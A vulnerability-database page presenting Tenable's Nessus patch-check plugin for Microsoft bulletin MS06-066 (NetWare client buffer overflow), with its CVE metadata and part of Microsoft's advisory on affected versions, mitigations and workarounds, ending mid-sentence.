Search...

MS06-066: Vulnerability in the Client Service for NetWare Could Allow Remote Code Execution (923980)

2006-11-14T00:00:00

ID SMB_NT_MS06-066.NASL
Type nessus
Reporter This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
Modified 2021-03-02T00:00:00

Description

The remote host contains a version of the Client Service for NetWare that is vulnerable to a buffer overflow. An attacker may exploit this to cause a denial of service by sending a malformed IPX packet to the remote host, or to execute arbitrary code by exploiting a flaw in the NetWare client.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(23643);
 script_version("1.31");
 script_cvs_date("Date: 2018/11/15 20:50:30");

 script_cve_id("CVE-2006-4688", "CVE-2006-4689");
 script_bugtraq_id(20984, 21023);
 script_xref(name:"MSFT", value:"MS06-066");
 script_xref(name:"MSKB", value:"923980");

 script_name(english:"MS06-066: Vulnerability in the Client Service for NetWare Could Allow Remote Code Execution (923980)");
 script_summary(english:"Determines the presence of update 923980");

 script_set_attribute(attribute:"synopsis", value:
"A flaw in the client service for NetWare may allow an attacker to
execute arbitrary code on the remote host.");
 script_set_attribute(attribute:"description", value:
"The remote host contains a version of the Client Service for NetWare
that is vulnerable to a buffer overflow.  An attacker may exploit this
to cause a denial of service by sending a malformed IPX packet to the
remote host, or to execute arbitrary code by exploiting a flaw in the
NetWare client.");
 script_set_attribute(attribute:"see_also", value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-066");
 script_set_attribute(attribute:"solution", value:
"Microsoft has released a set of patches for Windows 2000, XP and
2003.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"exploit_framework_core", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'MS06-066 Microsoft Services nwwks.dll Module Exploit');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');

 script_set_attribute(attribute:"vuln_publication_date", value:"2006/11/03");
 script_set_attribute(attribute:"patch_publication_date", value:"2006/11/14");
 script_set_attribute(attribute:"plugin_publication_date", value:"2006/11/14");

 script_set_attribute(attribute:"plugin_type", value:"local");
 script_set_attribute(attribute:"cpe", value:"cpe:/o:microsoft:windows");
 script_end_attributes();

 script_category(ACT_GATHER_INFO);

 script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");
 script_family(english:"Windows : Microsoft Bulletins");

 script_dependencies("smb_hotfixes.nasl", "ms_bulletin_checks_possible.nasl");
 script_require_keys("SMB/MS_Bulletin_Checks/Possible");
 script_require_ports(139, 445, 'Host/patch_management_checks');
 exit(0);
}

include("audit.inc");
include("smb_func.inc");
include("smb_hotfixes.inc");
include("smb_hotfixes_fcheck.inc");
include("misc_func.inc");

get_kb_item_or_exit("SMB/MS_Bulletin_Checks/Possible");

bulletin = 'MS06-066';
kb = '923980';

kbs = make_list(kb);
if (get_kb_item("Host/patch_management_checks")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);

get_kb_item_or_exit("SMB/Registry/Enumerated");
get_kb_item_or_exit("SMB/WindowsVersion", exit_code:1);

if (hotfix_check_sp_range(win2k:'4,5', xp:'2', win2003:'0,1') &lt;= 0) audit(AUDIT_OS_SP_NOT_VULN);

rootfile = hotfix_get_systemroot();
if (!rootfile) exit(1, "Failed to get the system root.");

share = hotfix_path2share(path:rootfile);
if (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);

if ( hotfix_is_vulnerable(os:"5.2", sp:0, arch:"x86", file:"nwrdr.sys", version:"5.2.3790.588", dir:"\system32\drivers", bulletin:bulletin, kb:kb) ||
     hotfix_is_vulnerable(os:"5.2", sp:1, arch:"x86", file:"nwrdr.sys", version:"5.2.3790.2783", dir:"\system32\drivers", bulletin:bulletin, kb:kb) ||
     hotfix_is_vulnerable(os:"5.1", sp:2, file:"nwrdr.sys", version:"5.1.2600.3015", dir:"\system32\drivers", bulletin:bulletin, kb:kb) ||
     hotfix_is_vulnerable(os:"5.0",       file:"nwrdr.sys", version:"5.0.2195.7110", dir:"\system32\drivers", bulletin:bulletin, kb:kb) )
{
  set_kb_item(name:"SMB/Missing/"+bulletin, value:TRUE);
  hotfix_security_hole();

  hotfix_check_fversion_end();
  exit(0);
}
else
{
  hotfix_check_fversion_end();
  audit(AUDIT_HOST_NOT, 'affected');
}

JSON Vulners Source

Initial Source

{"id": "SMB_NT_MS06-066.NASL", "bulletinFamily": "scanner", "title": "MS06-066: Vulnerability in the Client Service for NetWare Could Allow Remote Code Execution (923980)", "description": "The remote host contains a version of the Client Service for NetWare\nthat is vulnerable to a buffer overflow. An attacker may exploit this\nto cause a denial of service by sending a malformed IPX packet to the\nremote host, or to execute arbitrary code by exploiting a flaw in the\nNetWare client.", "published": "2006-11-14T00:00:00", "modified": "2021-03-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/23643", "reporter": "This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-066"], "cvelist": ["CVE-2006-4689", "CVE-2006-4688"], "type": "nessus", "lastseen": "2021-03-01T06:18:16", "edition": 28, "viewCount": 5, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4688", "CVE-2006-4689"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:15057", "SECURITYVULNS:DOC:15090"]}, {"type": "osvdb", "idList": ["OSVDB:30261", "OSVDB:30260"]}, {"type": "saint", "idList": ["SAINT:866F78907B0A26C8C60FB0A96361B13C", "SAINT:BADCBC24BD5102490F42E81092594F98", "SAINT:4287DA17D9C5FFF8AEA6BEEC76D913BB"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83029", "PACKETSTORM:82941"]}, {"type": "exploitdb", "idList": ["EDB-ID:16369", "EDB-ID:16373"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS06_066_NWAPI", "MSF:EXPLOIT/WINDOWS/SMB/MS06_066_NWWKS"]}, {"type": "canvas", "idList": ["MS06_066"]}], "modified": "2021-03-01T06:18:16", "rev": 2}, "score": {"value": 8.9, "vector": "NONE", "modified": "2021-03-01T06:18:16", "rev": 2}, "vulnersScore": 8.9}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(23643);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2006-4688\", \"CVE-2006-4689\");\n script_bugtraq_id(20984, 21023);\n script_xref(name:\"MSFT\", value:\"MS06-066\");\n script_xref(name:\"MSKB\", value:\"923980\");\n\n script_name(english:\"MS06-066: Vulnerability in the Client Service for NetWare Could Allow Remote Code Execution (923980)\");\n script_summary(english:\"Determines the presence of update 923980\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A flaw in the client service for NetWare may allow an attacker to\nexecute arbitrary code on the remote host.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of the Client Service for NetWare\nthat is vulnerable to a buffer overflow. An attacker may exploit this\nto cause a denial of service by sending a malformed IPX packet to the\nremote host, or to execute arbitrary code by exploiting a flaw in the\nNetWare client.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2006/ms06-066\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP and\n2003.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS06-066 Microsoft Services nwwks.dll Module Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/11/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS06-066';\nkb = '923980';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2', win2003:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif ( hotfix_is_vulnerable(os:\"5.2\", sp:0, arch:\"x86\", file:\"nwrdr.sys\", version:\"5.2.3790.588\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:1, arch:\"x86\", file:\"nwrdr.sys\", version:\"5.2.3790.2783\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"nwrdr.sys\", version:\"5.1.2600.3015\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"nwrdr.sys\", version:\"5.0.2195.7110\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:kb) )\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "pluginID": "23643", "cpe": ["cpe:/o:microsoft:windows"], "scheme": null}

{"cve": [{"lastseen": "2021-02-02T05:27:24", "description": "Unspecified vulnerability in the driver for the Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to cause a denial of service (hang and reboot) via has unknown attack vectors, aka \"NetWare Driver Denial of Service Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2006-11-14T22:07:00", "title": "CVE-2006-4689", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4689"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_2003_server:sp1", "cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2006-4689", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4689", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2003_server:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:fr:*:*:*:*"]}, {"lastseen": "2021-02-02T05:27:24", "description": "Buffer overflow in Client Service for NetWare (CSNW) in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 up to SP1 allows remote attackers to execute arbitrary code via crafted messages, aka \"Client Service for NetWare Memory Corruption Vulnerability.\"", "edition": 4, "cvss3": {}, "published": "2006-11-14T22:07:00", "title": "CVE-2006-4688", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4688"], "modified": "2018-10-17T21:39:00", "cpe": ["cpe:/o:microsoft:windows_2000:*", "cpe:/o:microsoft:windows_2003_server:sp1", "cpe:/o:microsoft:windows_xp:*"], "id": "CVE-2006-4688", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_2003_server:sp1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:fr:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "cvelist": ["CVE-2006-4689", "CVE-2006-4688"], "description": "Microsoft Security Bulletin MS06-066\r\nVulnerabilities in Client Service for NetWare Could Allow Remote Code Execution (923980)\r\nPublished: November 14, 2006\r\n\r\nVersion: 1.0\r\nSummary\r\n\r\nWho Should Read this Document: Customers who use Microsoft Windows\r\n\r\nImpact of Vulnerabilities: Remote Code Execution\r\n\r\nMaximum Severity Rating: Important\r\n\r\nRecommendation: Customers should apply the update at the earliest opportunity.\r\n\r\nSecurity Update Replacement: This bulletin replaces a prior security update. See the frequently asked questions (FAQ) section of this bulletin for the complete list.\r\n\r\nCaveats: None.\r\n\r\nTested Software and Security Update Download Locations:\r\n\r\nAffected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows 2000 Service Pack 4 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Service Pack 2 \u2014 Download the update\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1 \u2014 Download the update\r\n\r\nNon-Affected Software:\r\n\u2022\t\r\n\r\nMicrosoft Windows XP Professional x64 Edition\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems\r\n\u2022\t\r\n\r\nMicrosoft Windows Server 2003 x64 Edition\r\n\u2022\t\r\n\r\nWindows Vista\r\n\r\nThe software in this list has been tested to determine whether the versions are affected. Other versions either no longer include security update support or may not be affected. To determine the support life cycle for your product and version, visit the Microsoft Support Lifecycle Web site.\r\nTop of sectionTop of section\r\nGeneral Information\r\n\t\r\nExecutive Summary\r\n\r\nExecutive Summary:\r\n\r\nThis update resolves several newly discovered, privately reported vulnerabilities. Each vulnerability is documented in its own subsection in the "Vulnerability Details" section of this bulletin.\r\n\r\nThe Client Service for NetWare is also called the Gateway Service for NetWare on Windows 2000 Server.\r\n\r\nOn vulnerable versions of Microsoft Windows, an attacker who successfully exploited these vulnerabilities could remotely take complete control of the client workstation. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\r\n\r\nWe recommend that customers apply the update at the earliest opportunity.\r\n\r\nSeverity Ratings and Vulnerability Identifiers:\r\nVulnerability Identifiers\tImpact of Vulnerability\tWindows 2000 Service Pack 4\tWindows XP Professional Service Pack 2 \tWindows Server 2003 and Windows Server 2003 Service Pack 1\r\n\r\nMicrosoft Client Service for NetWare Memory Corruption Vulnerability - CVE-2006-4688\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nModerate\r\n\r\nNetWare Driver Denial of Service Vulnerability - CVE-2006-4689\r\n\t\r\n\r\nDenial of Service\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nModerate\r\n\t\r\n\r\nLow\r\n\r\nAggregate Severity of All Vulnerabilities\r\n\t\r\n\r\n \r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nModerate\r\n\r\nThis assessment is based on the types of systems that are affected by the vulnerability, their typical deployment patterns, and the effect that exploiting the vulnerability would have on them.\r\nTop of sectionTop of section\r\n\t\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nWhy does this update address several reported security vulnerabilities?\r\nThis update contains support for several vulnerabilities because the modifications that are required to address these issues are located in related files. Instead of having to install several updates that are almost the same, customers can install only this update.\r\n\r\nWhat updates does this release replace?\r\nThis security update replaces a prior security update. The security bulletin ID and affected operating systems are listed in the following table.\r\nBulletin ID\tWindows 2000 Service Pack 4\tWindows XP Professional Service Pack 2 \tWindows Server 2003 and Windows Server 2003 Service Pack 1\r\n\r\nMS05-046\r\n\t\r\n\r\nNot Replaced\r\n\t\r\n\r\nReplaced\r\n\t\r\n\r\nNot Replaced\r\n\r\nExtended security update support for Microsoft Windows 98, Windows 98 Second Edition, or Windows Millennium Edition ended on July 11, 2006. I am still using one of these operating systems; what should I do?\r\nWindows 98, Windows 98 Second Edition, and Windows Millennium Edition have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows XP Home Edition Service Pack 1 or Service Pack 1a, Windows XP Media Center Edition 2002 Service Pack 1, Windows XP Media Center Edition 2004 Service Pack 1, Windows XP Professional Service Pack 1 or Service Pack 1a, and Windows XP Tablet PC Edition Service Pack 1 ended on October 10, 2006. I am still using one of these operating systems; what should I do?\r\nWindows XP (all versions) Service Pack 1 has reached the end of its support life cycle. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nExtended security update support for Microsoft Windows NT Workstation 4.0 Service Pack 6a and Windows 2000 Service Pack 2 ended on June 30, 2004. Extended security update support for Microsoft Windows NT Server 4.0 Service Pack 6a ended on December 31, 2004. Extended security update support for Microsoft Windows 2000 Service Pack 3 ended on June 30, 2005. I am still using one of these operating systems; what should I do?\r\nWindows NT Workstation 4.0 Service Pack 6a, Windows NT Server 4.0 Service Pack 6a, Windows 2000 Service Pack 2, and Windows 2000 Service Pack 3 have reached the end of their support life cycles. It should be a priority for customers who have these operating system versions to migrate to supported versions to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle Web site. For more information about the extended security update support period for these operating system versions, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for these products must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nFor more information, visit the Windows Operating System FAQ.\r\n\r\nCan I use the Microsoft Baseline Security Analyzer (MBSA) to determine whether this update is required?\r\nThe following table provides the MBSA detection summary for this security update.\r\nProduct\tMBSA 1.2.1\tMBSA 2.0\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nFor more information about MBSA, visit the MBSA Web site. For more information about the programs that Microsoft Update and MBSA 2.0 currently do not detect, see Microsoft Knowledge Base Article 895660.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\n\r\nCan I use Systems Management Server (SMS) to determine whether this update is required?\r\nThe following table provides the SMS detection summary for this security update.\r\nProduct\tSMS 2.0\tSMS 2003\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows XP Service Pack 2\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nMicrosoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1\r\n\t\r\n\r\nYes\r\n\t\r\n\r\nYes\r\n\r\nSMS 2.0 and SMS 2003 Software Updates Feature Pack can use MBSA 1.2.1 for detection and therefore have the same limitation that is listed earlier in this bulletin related to programs that MBSA 1.2.1 does not detect.\r\n\r\nFor more information about SMS, visit the SMS Web site.\r\n\r\nFor more detailed information, see Microsoft Knowledge Base Article 910723.\r\nTop of sectionTop of section\r\n\t\r\nVulnerability Details\r\n\t\r\nClient Service for NetWare Memory Corruption Vulnerability - CVE-2006-4688:\r\n\r\nThere is a remote code execution vulnerability in Client Service for NetWare (CSNW) that could allow an attacker who successfully exploited this vulnerability to take complete control of the affected system.\r\n\t\r\nMitigating Factors for Client Service for NetWare Memory Corruption Vulnerability - CVE-2006-4688:\r\n\u2022\t\r\n\r\nWindows XP Home Edition is not vulnerable to this issue. Windows XP Home Edition does not contain the vulnerable component.\r\n\u2022\t\r\n\r\nOn Windows Server 2003 and Windows Server 2003 Service Pack 1 an attacker would need to be an authenticated user with valid logon credentials in order to successfully carry out an attack on an affected system.\r\n\u2022\t\r\n\r\nFor customers who require the affected component firewall best practices and standard default firewall configurations can help protect networks from attacks that originate outside the enterprise perimeter. Best practices recommend that systems that are connected to the Internet have a minimal number of ports exposed.\r\n\u2022\t\r\n\r\nBy default, the Client Service for NetWare is not installed on any affected operating system version. Only customers who install this service are likely to be vulnerable to this issue.\r\nTop of sectionTop of section\r\n\t\r\nWorkarounds for Client Service for NetWare Memory Corruption Vulnerability - CVE-2006-4688:\r\n\r\nMicrosoft has tested the following workarounds. Although these workarounds will not correct the underlying vulnerability, they help block known attack vectors. When a workaround reduces functionality, it is identified in the following section.\r\n\r\nNote CSNW is commonly associated with the Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) protocols. However, CSNW could be exploited by using any installed protocol. Because TCP/IP is the most commonly used protocol, the following workarounds are based on TCP/IP. If protocols such as IPX and SPX are being used, you should also block the appropriate ports for those protocols. For more information about IPX and SPX, visit this site.\r\n\u2022\t\r\n\r\nRemove the Client Service for NetWare if you do not need it.\r\n\r\nIf you no longer need the Client Service for NetWare, remove it. To do this, follow these steps.\r\n\r\nWindows XP\r\n\r\n1.\r\n\t\r\n\r\nOpen Network Connections.\r\n\r\n2.\r\n\t\r\n\r\nRight-click a local area connection and then click Properties.\r\n\r\n3.\r\n\t\r\n\r\nIn the This connection uses the following items list click Client Service for NetWare.\r\n\r\n4.\r\n\t\r\n\r\nClick the General tab and then click Uninstall.\r\n\r\n5.\r\n\t\r\n\r\nComplete the removal by following the instructions on the screen.\r\n\r\nWindows 2000\r\n\r\n1.\r\n\t\r\n\r\nLog in as administrator.\r\n\r\n2.\r\n\t\r\n\r\nRight-click on My Network Places.\r\n\r\n3.\r\n\t\r\n\r\nClick Properties.\r\n\r\n4.\r\n\t\r\n\r\nClick Local Area Connection.\r\n\r\n5.\r\n\t\r\n\r\nHighlight CSNW and click Uninstall.\r\n\r\n6.\r\n\t\r\n\r\nOn the pop up dialog box that displays, click Yes.\r\n\r\nImpact of Workaround: Some organizations require the affected component for important functions. Administrators should not remove the affected component unless they fully understand the effect that doing this will have on their environment.\r\n\u2022\t\r\n\r\nBlock TCP ports 139 and 445 at the firewall:\r\n\r\nThese ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. We recommend that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports. For more information about ports, visit the following Web site.\r\n\r\nImpact of Workaround: Several Windows services use the affected ports. Blocking connectivity to the ports may cause various applications or services to not function. Some of the applications or services that could be impacted are listed below.\r\n\r\nApplications that uses SMB (CIFS)\r\n\r\nApplications that uses mailslots or named pipes (RPC over SMB)\r\n\r\nServer (File and Print Sharing)\r\n\r\nGroup Policy\r\n\r\nNet Logon\r\n\r\nDistributed File System (DFS)\r\n\r\nTerminal Server Licensing\r\n\r\nPrint Spooler\r\n\r\nComputer Browser\r\n\r\nRemote Procedure Call Locator\r\n\r\nFax Service\r\n\r\nIndexing Service\r\n\r\nPerformance Logs and Alerts\r\n\r\nSystems Management Server\r\n\r\nLicense Logging Service\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, use a personal firewall, such as the Windows Firewall, which is included with Windows XP.\r\n\r\nBy default, the Windows Firewall feature in Windows XP and in Windows Server 2003 helps protect your Internet connection by blocking unsolicited incoming traffic. We recommend that you block all unsolicited incoming communication from the Internet.\r\n\r\nTo enable the Windows Firewall feature by using the Network Setup Wizard, follow these steps:\r\n\r\n1.Click Start, and then click Control Panel.\r\n\r\n2.Double-click Network Connections and then click Change Windows Firewall settings.\r\n\r\n3.On the General tab, ensure that the On (recommended) value is selected. This will enable the Windows Firewall.\r\n\r\n4.Once the Windows Firewall is enabled, select Don\u2019t allow exceptions to prohibit all incoming traffic.\r\n\r\nNote If you want to enable certain programs and services to communicate through the firewall, de-select Don\u2019t allow exceptions and click the Exceptions tab. On the Exception tab, select the programs, protocols, and services you want to enable.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, enable advanced TCP/IP filtering on systems that support this feature.\r\n\r\nYou can enable advanced TCP/IP filtering to block all unsolicited inbound traffic. For more information about how to configure TCP/IP filtering, see Microsoft Knowledge Base Article 309798.\r\n\u2022\t\r\n\r\nTo help protect from network-based attempts to exploit this vulnerability, block the affected ports by using IPSec on the affected systems.\r\n\r\nUse Internet Protocol security (IPSec) to help protect network communications. Detailed information about IPSec and about how to apply filters is available in Microsoft Knowledge Base Article 313190 and Microsoft Knowledge Base Article 813878.\r\nTop of sectionTop of section\r\n\t\r\nFAQ for Client Service for NetWare Memory Corruption Vulnerability - CVE-2006-4688:\r\n\r\nWhat is the scope of the vulnerability?\r\nThis is a remote code execution vulnerability in the Client Service for NetWare (CSNW). An attacker who successfully exploited this vulnerability could remotely take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. This service is also called Gateway Service for NetWare on Windows 2000 Server.\r\n\r\nWhat causes the vulnerability?\r\nAn unchecked buffer in the Client Service for NetWare.\r\n\r\nWhat is Client Service for NetWare?\r\nThe Client Service for NetWare (CSNW) allows the client to access NetWare file, print, and directory services. Both Microsoft and Novell provide a client service for this purpose: Microsoft Client Service for NetWare and Novell Client for Microsoft Windows XP, respectively. This vulnerability affects the Microsoft Client Service for NetWare. For more information about NetWare access, visit the following Web site. This service is also called Gateway Service for NetWare on Windows 2000 Server.\r\n\r\nWhat might an attacker use the vulnerability to do?\r\nAn attacker who successfully exploited this vulnerability could take complete control of the affected system.\r\n\r\nWho could exploit the vulnerability?\r\nAny anonymous user who could deliver a specially crafted message to the affected system could try to exploit this vulnerability.\r\n\r\nHow could an attacker exploit the vulnerability?\r\nAn attacker could try to exploit the vulnerability directly over a network by creating a series of specially crafted network messages and sending them to an affected system. The messages could then cause the affected system to execute code.\r\n\r\nWhat systems are primarily at risk from the vulnerability?\r\nAll systems that have the Client Service for NetWare installed (also known as the Gateway Service for NetWare), are primarily at risk from this vulnerability. By default, this component is not installed on any affected operating system version. Only customers who manually install this component are likely to be vulnerable to this issue.\r\n\r\nCould the vulnerability be exploited over the Internet?\r\nYes. An attacker could try to exploit this vulnerability over the Internet. Firewall best practices and standard default firewall configurations can help protect against attacks that originate from the Internet. Microsoft has provided information about how you can help protect your PC. End users can 